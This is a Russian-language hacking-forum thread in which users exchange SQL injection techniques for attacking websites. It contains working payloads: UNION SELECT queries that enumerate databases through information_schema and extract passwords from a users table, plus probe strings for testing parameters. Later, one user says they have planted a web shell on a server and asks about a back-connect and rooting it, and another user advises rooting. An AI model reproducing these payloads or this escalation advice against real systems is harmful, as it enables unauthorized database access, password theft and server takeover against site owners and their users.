 |
|
07.02.2011, 22:36
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Вот. Нашел на свой вопрос удобный ответ. Товарищ помог
group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME)
Вдруг кому понадобиться.
|
|
|
08.02.2011, 19:25
|
|
Новичок
Регистрация: 26.01.2011
Сообщений: 2
С нами:
8049206
Репутация:
0
|
|
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?
|
|
|
|
08.02.2011, 19:30
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Ne1c
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?
1) Узнаем имеющиеся БД:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]union select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]schema_name[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]schemata[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]
2) Узнаем таблицы из определенной БД
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables where table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'test'[/COLOR][/COLOR]
3) Выводим данные из определенной БД:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]union select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password from test[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]users[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]
|
|
|
|
08.02.2011, 19:32
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от Ne1c
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?
1) Если не известно название БД, то узнать его можно таким запросом
Код:
Select table_schema from information_schema.tables where table_name = {Нужный_тебе_столбец}
2) Если известно, то "переключиться" можно так
Код:
Select Нужная_тебе_информация from table_schema.Нужный_тебе_столбец
Где table_schema - название необходимой БД
|
|
|
|
09.02.2011, 08:51
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
подскажите
http://databases.about.com/od/security/a/sql_inject_test.htm
в этой статье говорится
Сообщение от None
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
бла-бла
Сообщение от None
If you receive either one of the two errors above, your application is vulnerable to SQL injection attack!
у меня тоже такая ошибка вылезла
но только model=pr11'&(другие параметры)
пробовал
Сообщение от None
model=pr11'+and+1=1+--+&(другие параметры)
model=pr11'+order+by+1+--+&(другие параметры)
model=pr11+order+by+1+--+&(другие параметры)
model=pr11+order+by+1/*&(другие параметры)
не помогает ошибка так и осталась
каким способом можно еще проверить? |
|
|
|
09.02.2011, 14:39
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Эта ошибка совсем не является однозначным показателем присутствия скули.
Также она может получаться, например, при конфликте кодировок (обычно бывает уже непосредственно при выводе)
В твоем случае я бы поставил, что скули нет.
|
|
|
|
09.02.2011, 16:17
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от noviyuser
подскажите
http://databases.about.com/od/security/a/sql_inject_test.htm
в этой статье говорится
бла-бла
у меня тоже такая ошибка вылезла
но только model=pr11'&(другие параметры)
пробовал
не помогает ошибка так и осталась
каким способом можно еще проверить?
покажи что за ошибки выдаёт и при каких запросах
просто в запросах могут быть например скобки, а ты комментируешь закрывающие. Поэтому я всегда смотрю id=1+and+1=1 или id=1'+and+'1'='1, т.к. работает внезависимости от скобок
|
|
|
|
09.02.2011, 21:41
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
У него лишь 500 ошибка, что бы он не подставлял.
|
|
|
|
09.02.2011, 23:21
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Залил шелл, залажу в корень, в точку монтирования (/mnt), вижу отображение всего, что нужно а вот слить не могу, в чем проблема? или надо делать бекконнект, и рутать серв?
P/S права на чтение папки есть ...
|
|
|
|
09.02.2011, 23:26
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Прав на файлы м.б. не хватает? Т.е. на папку права есть, а на содержимое ее нет.
Лучше рутай, если получится.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
